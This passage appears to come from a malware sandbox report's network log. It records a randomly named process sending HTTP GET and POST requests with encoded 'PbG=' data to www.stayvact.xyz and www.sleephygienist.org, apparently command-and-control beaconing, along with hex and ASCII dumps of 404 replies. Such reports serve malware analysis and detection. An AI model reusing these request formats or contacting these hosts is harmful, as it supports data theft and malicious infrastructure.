                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.stayvact.xyz
                                                                                                                                                    Referer: http://www.stayvact.xyz/44em/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 76 45 6d 57 71 78 73 46 45 59 46 6d 30 68 52 73 78 4b 79 51 61 55 42 7a 64 69 57 78 34 45 6d 30 4a 67 33 30 75 44 58 43 2b 41 63 5a 6d 2b 69 37 34 52 5a 52 64 4c 79 50 75 54 79 4a 70 73 4a 63 2f 50 6e 58 69 6d 72 4d 51 6f 54 6a 64 4d 30 44 32 7a 49 33 68 33 66 74 6c 7a 56 32 50 69 47 35 39 77 68 59 58 44 4f 43 34 51 53 4e 46 79 69 53 65 55 2f 57 79 5a 4c 4b 71 38 6d 38 51 50 52 62 6e 57 48 79 46 62 48 73 6f 68 6b 6a 6b 6f 48 33 6d 57 73 5a 62 54 58 6b 6a 45 49 2f 79 41 55 2f 64 4b 47 73 4c 39 55 76 52 74 59 47 31 50 30 51 56 44 4e 48 73 57 2f 79 71 42 56 2f 62 31 69 45 43 5a 31 63 79 79 56 4b 4d 65 36 32 54 49 6f 43 5a 55 68 2f 49 54 2b 56 7a 58 45 6d 59 58 49 75 67 75 51 45 46 34 50 57 4c 66 57 67 52 48 53 72 48 36 39 71 4c 33 43 2f 74 61 30 69 66 45 62 2b 54 66 65 35 57 58 65 7a 32 33 4e 58 62 49 51 4d 6d 70 74 69 41 57 4e 63 39 64 69 45 4f 2b 2f 33 39 46 50 51 36 78 59 71 31 73 6a 50 67 6d 73 32 66 66 38 51 54 42 57 4f 6b 66 2b 72 77 4c 75 70 54 34 51 38 36 52 6d 50 2b 55 4d 33 37 31 [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=vEmWqxsFEYFm0hRsxKyQaUBzdiWx4Em0Jg30uDXC+AcZm+i74RZRdLyPuTyJpsJc/PnXimrMQoTjdM0D2zI3h3ftlzV2PiG59whYXDOC4QSNFyiSeU/WyZLKq8m8QPRbnWHyFbHsohkjkoH3mWsZbTXkjEI/yAU/dKGsL9UvRtYG1P0QVDNHsW/yqBV/b1iECZ1cyyVKMe62TIoCZUh/IT+VzXEmYXIuguQEF4PWLfWgRHSrH69qL3C/ta0ifEb+Tfe5WXez23NXbIQMmptiAWNc9diEO+/39FPQ6xYq1sjPgms2ff8QTBWOkf+rwLupT4Q86RmP+UM371RdjN2co6OSWSQUmcL8/pOrjFKuQWuJLG79+193GB1J2I/PvScELmOJaqg1WydZA1XiedynGilmZDoDd2xpSyUVkE6C+pt6aUcjD/irxvNIMlogfATLEEUwnQV4YRuZIMDpuzEoBvELo8m9bZvwydXfmEse0djTVVZVNdN9qefNojINcgJZu7pGBpT6DyM4LE7/EWcol0OXkTVbZ1wV7EbU43ZEZ4A8o9xUcsjb4BpHKbbgmNdDnpYN1PyCcsyqWN2HIvwNizZyggwb7/6Lc1cEJbrGgAmn1qIrqKp3rsIGRUAdPawd34QNAVdcM355tV7h9zeTLAEnkdgE90s0hrLHU9QLAbDWDSNOfTS6Ne0iDn9aA4C2Hlhuu/dT49uTS4ne0cPYdhG71qfT5sByCbudZ4vVJWO+wEuitq41gKvZqOylAcxh67pMhWtHJ1sG3KjUzED9ryhkKMWVqtjEdc8gS+OyADZohrBo63BFifQWnt9N2bwls4MA+EFlFNuFmqMWfKpD0VQvmKbjvW5vs8cUgr1sCOEEP9u6E3GjH3Op/aKaNWaJe/b4NB7XjZntWVCJqAuUCIrcXn+aQPbxBCLFW7mH1iYEm1qATFbmyOutwhZ847MCtpfRcf43zqAG2ukZGf6WhX7HpXcV3oAaXtmRakToC3XYsTAC [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:02:15.542936087 CEST1753OUTData Raw: 6c 43 46 69 68 59 52 71 36 57 37 6e 7a 57 69 45 6c 68 30 4f 6d 38 68 44 56 78 55 59 70 6d 35 32 6f 7a 7a 71 65 74 41 6a 35 75 42 53 43 63 48 65 4e 54 68 43 35 57 63 72 32 58 77 50 58 76 73 74 47 63 4e 70 30 4f 41 47 44 47 34 61 2b 56 66 38 76 48
                                                                                                                                                    Data Ascii: lCFihYRq6W7nzWiElh0Om8hDVxUYpm52ozzqetAj5uBSCcHeNThC5Wcr2XwPXvstGcNp0OAGDG4a+Vf8vH29sidYrCQPakNBqRo5XF+8G+U/vxExQYvpmovudxiqaTVGBVyQ56TjtVyguXqlvrctVFOF1WeF4OJlRaCrBCd+83m3B3jdqyURZhU958t7ZoJw2JDR/NYwO1n1Fk/od6pHvU8w+JRMz0IegN44bhta1x22xFQRJq7
                                                                                                                                                    Oct 4, 2024 12:02:15.750777960 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:02:15 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Length: 16026
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:02:15.750863075 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32
                                                                                                                                                    Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380
                                                                                                                                                    Oct 4, 2024 12:02:15.751024008 CEST1289INData Raw: 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73
                                                                                                                                                    Data Ascii: ="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="sta
                                                                                                                                                    Oct 4, 2024 12:02:15.751176119 CEST1289INData Raw: 31 33 35 22 20 79 31 3d 22 31 33 32 2e 37 34 36 22 20 78 32 3d 22 33 32 30 2e 31 33 35 22 20 79 32 3d 22 31 35 33 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65
                                                                                                                                                    Data Ascii: 135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" />
                                                                                                                                                    Oct 4, 2024 12:02:15.751192093 CEST1289INData Raw: 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 39 2e 35 35 35 22 20 79 31 3d 22 32 39 39 2e 37 36 35 22 20 78 32 3d 22 34 38 39 2e 35 35 35 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20
                                                                                                                                                    Data Ascii: "10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945"
                                                                                                                                                    Oct 4, 2024 12:02:15.751276016 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 78 31 3d 22 31 38 36 2e 33 35 39 22 20 79 31 3d 22 34 30 36 2e 39 36 37 22 20 78 32 3d 22 31 38 36 2e 33 35 39 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: x1="186.359" y1="406.967" x2="186.359" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x2="182.44" y2="
                                                                                                                                                    Oct 4, 2024 12:02:15.751394033 CEST1289INData Raw: 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73
                                                                                                                                                    Data Ascii: <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-line
                                                                                                                                                    Oct 4, 2024 12:02:15.751408100 CEST1289INData Raw: 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 31 33 30 2e 36 39 33 22 20 63 79 3d 22 33 30 35 2e 36 30 38 22 20 72 3d 22 32 2e 36 35
                                                                                                                                                    Data Ascii: 2.651" /> <circle fill="#0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="477.014" r="2.651" /> </g> </g> <g id="spaceman" clip-path="u
                                                                                                                                                    Oct 4, 2024 12:02:15.752346992 CEST1289INData Raw: 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 46 46
                                                                                                                                                    Data Ascii: 3.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="235.617" r="6.37
                                                                                                                                                    Oct 4, 2024 12:02:15.752501965 CEST1289INData Raw: 2e 36 36 63 2d 31 2e 37 30 32 2c 30 2e 32 34 32 2d 35 2e 39 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39 2d 38 2e 39 36 33 2c 31 32 2e 33 33 35 2d 35
                                                                                                                                                    Data Ascii: .66c-1.702,0.242-5.91,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    60192.168.11.2049792199.192.19.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:18.251822948 CEST426OUTGET /44em/?PbG=iGO2pBA+GdZFzSp95ITiNE0UdXGz/GDPPTuDgRXb9x0A8cbI0BsffOr86U/ry5cw9/6dj1rDQbqcJPAE3iEy6ACI9UEhGVzT4hJYYQarhHeSOj2eWmeo6uY=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.stayvact.xyz
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:02:18.453294992 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:02:18 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Length: 16026
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:02:18.453378916 CEST1289INData Raw: 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33
                                                                                                                                                    Data Ascii: 301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,
                                                                                                                                                    Oct 4, 2024 12:02:18.453533888 CEST1289INData Raw: 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 0a 20 20
                                                                                                                                                    Data Ascii: city="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149" /> </g>
                                                                                                                                                    Oct 4, 2024 12:02:18.453550100 CEST1289INData Raw: 20 20 20 20 20 20 20 78 31 3d 22 33 32 30 2e 31 33 35 22 20 79 31 3d 22 31 33 32 2e 37 34 36 22 20 78 32 3d 22 33 32 30 2e 31 33 35 22 20 79 32 3d 22 31 35 33 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                    Data Ascii: x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="1
                                                                                                                                                    Oct 4, 2024 12:02:18.453648090 CEST1289INData Raw: 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 39 2e 35 35 35 22 20 79 31 3d 22 32 39 39 2e 37 36 35 22 20 78 32 3d 22 34 38 39 2e 35 35 35 22 20 79 32 3d
                                                                                                                                                    Data Ascii: oke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636
                                                                                                                                                    Oct 4, 2024 12:02:18.453733921 CEST1289INData Raw: 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 31 38 36 2e 33 35 39 22 20 79 31 3d 22 34 30 36 2e 39 36 37 22 20 78 32 3d 22 31 38 36 2e 33 35 39 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20
                                                                                                                                                    Data Ascii: 10" x1="186.359" y1="406.967" x2="186.359" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x
                                                                                                                                                    Oct 4, 2024 12:02:18.453746080 CEST1289INData Raw: 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69
                                                                                                                                                    Data Ascii: > <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width=
                                                                                                                                                    Oct 4, 2024 12:02:18.453851938 CEST1289INData Raw: 79 3d 22 35 33 30 2e 39 32 33 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 31 33 30 2e 36 39 33 22 20 63 79 3d 22 33
                                                                                                                                                    Data Ascii: y="530.923" r="2.651" /> <circle fill="#0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="477.014" r="2.651" /> </g> </g> <g id="spacema
                                                                                                                                                    Oct 4, 2024 12:02:18.453954935 CEST1289INData Raw: 6d 69 74 3d 22 31 30 22 20 78 31 3d 22 33 32 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63
                                                                                                                                                    Data Ascii: mit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="2
                                                                                                                                                    Oct 4, 2024 12:02:18.454082012 CEST1289INData Raw: 09 09 09 4d 33 30 31 2e 33 30 31 2c 33 34 37 2e 36 36 63 2d 31 2e 37 30 32 2c 30 2e 32 34 32 2d 35 2e 39 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39
                                                                                                                                                    Data Ascii: M301.301,347.66c-1.702,0.242-5.91,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" s
                                                                                                                                                    Oct 4, 2024 12:02:18.638196945 CEST1289INData Raw: 36 39 2e 36 37 38 2c 33 39 34 2e 39 31 32 4c 32 36 39 2e 36 37 38 2c 33 39 34 2e 39 31 32 63 32 36 2e 33 2c 32 30 2e 36 34 33 2c 35 39 2e 36 35 34 2c 32 39 2e 35 38 35 2c 39 33 2e 31 30 36 2c 32 35 2e 37 32 34 6c 32 2e 34 31 39 2d 30 2e 31 31 34
                                                                                                                                                    Data Ascii: 69.678,394.912L269.678,394.912c26.3,20.643,59.654,29.585,93.106,25.724l2.419-0.114" /> </g> <g id="legs"> <g id="legR"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" strok


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    61192.168.11.204979313.248.169.48801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:23.757869959 CEST702OUTPOST /9ned/ HTTP/1.1
                                                                                                                                                    Host: www.sleephygienist.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.sleephygienist.org
                                                                                                                                                    Referer: http://www.sleephygienist.org/9ned/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 77 32 68 5a 69 54 49 46 4f 2f 4f 64 7a 70 30 79 47 42 79 67 31 35 59 2b 6c 4c 67 71 68 62 34 63 46 43 67 47 35 54 4b 51 2b 61 45 33 78 4a 4a 42 69 43 4f 37 55 71 79 36 4a 4a 73 68 62 4d 49 76 70 77 65 2f 69 75 59 66 35 59 4c 36 59 78 41 45 70 54 6f 7a 77 4c 79 52 31 5a 59 54 72 79 6b 62 38 5a 71 46 68 4b 39 37 74 4d 46 62 51 79 52 78 2b 4e 49 73 45 70 2b 77 51 33 54 6b 71 73 5a 6b 32 2f 7a 4a 33 79 4e 4c 54 43 39 4a 38 78 37 54 55 6e 61 33 71 56 67 71 38 42 44 76 61 2b 68 32 31 2f 55 4d 49 61 72 77 78 72 31 57 34 4c 52 74 48 69 6f 48 6b 35 78 51 36 64 51 76 66 34 65 36 5a 67 3d 3d
                                                                                                                                                    Data Ascii: PbG=w2hZiTIFO/Odzp0yGByg15Y+lLgqhb4cFCgG5TKQ+aE3xJJBiCO7Uqy6JJshbMIvpwe/iuYf5YL6YxAEpTozwLyR1ZYTrykb8ZqFhK97tMFbQyRx+NIsEp+wQ3TkqsZk2/zJ3yNLTC9J8x7TUna3qVgq8BDva+h21/UMIarwxr1W4LRtHioHk5xQ6dQvf4e6Zg==


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    62192.168.11.204979413.248.169.48801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:26.385068893 CEST722OUTPOST /9ned/ HTTP/1.1
                                                                                                                                                    Host: www.sleephygienist.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.sleephygienist.org
                                                                                                                                                    Referer: http://www.sleephygienist.org/9ned/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
